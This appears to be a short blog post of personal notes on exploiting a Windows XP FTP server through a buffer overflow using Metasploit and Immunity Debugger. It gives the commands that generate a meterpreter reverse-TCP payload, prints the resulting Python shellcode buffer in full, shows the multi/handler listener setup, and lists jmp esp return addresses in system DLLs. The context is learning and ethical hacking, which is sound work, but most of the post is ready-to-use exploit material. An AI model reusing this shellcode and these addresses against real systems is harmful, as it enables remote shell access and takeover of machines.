Saturday, November 22, 2014

Notes created for Immunity Debugger

Notes about generating a payload for a python script, setting up a multi-handler, and using a multi-handler to then exploit and gain a meterpreter shell.

Generate Meterpreter Reverse TCP with the multi-handler listening
use payload/windows/meterpreter/reverse_ord_tcp
set lhost
set lport 4444

generate -b '\x00\x0a\x0d\x20' -t python
- This generates a payload without the hex characters following the b in the language of python.

buf =  ""
buf += "\xda\xc1\xd9\x74\x24\xf4\xb8\xec\x27\x13\x24\x5b\x33"
buf += "\xc9\xb1\x18\x31\x43\x18\x83\xeb\xfc\x03\x43\xf8\xc5"
buf += "\xe6\xd8\x31\xd1\x6d\xaa\x72\xd5\xe6\xec\x78\x9e\xa9"
buf += "\xf0\x0b\xb2\xc2\x7b\x2b\x1e\x79\x35\x28\x66\xbf\xf8"
buf += "\x1d\x39\x8d\x89\x8e\x4e\x9b\x79\xdb\x14\x60\xf1\x97"
buf += "\x93\xe0\x8e\x6b\x91\x0c\x90\x9a\x22\x6d\xca\x5d\xdd"
buf += "\xe5\x9b\x61\x1c\x14\x58\xf0\x12\xbb\x35\x03\x41\x39"
buf += "\x35\xd3\x02\x55\x65\xc3\x4a\xa7\x1d\xe1\x92\xb6\x81"
buf += "\x6c\x73\xeb\x8e\x62\x27\x5d\xa6\x2b\xad\x4d\x19\x9c"
buf += "\x67\x91\x7c"

use exploit/multi/handler
set payload windows/meterpreter/reverse_ord_tcp
set lhost

*** With the Immunity Debugger we need to find memory addresses that have "jmp esp" instructions.

1. Load or attach the FTP server with Immunity Debugger
2. Click the shortcut of "e" to load the Modules menu of all of the .dll's that are running
3. Double click on one of them not related to the FTP server
4. Right-click go to Search for ... "All commands in all modules"
5. Key in the instruction that you are searching for "jmp esp"
6. It then returns a list of "jmp esp" instructions and associated memory addresses...
Windows XP w/ SP3 - MFC42.dll 0x73E32ECF
Windows XP w/ SP3 - WINMM.dll 0x76B43ADC
Windows XP w/ SP3 - ADVAPI32.dll 0x77DEF049

No comments:

Post a Comment

Docker with Juiceshop - Focus on SQL Injection

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub or docker images to refr...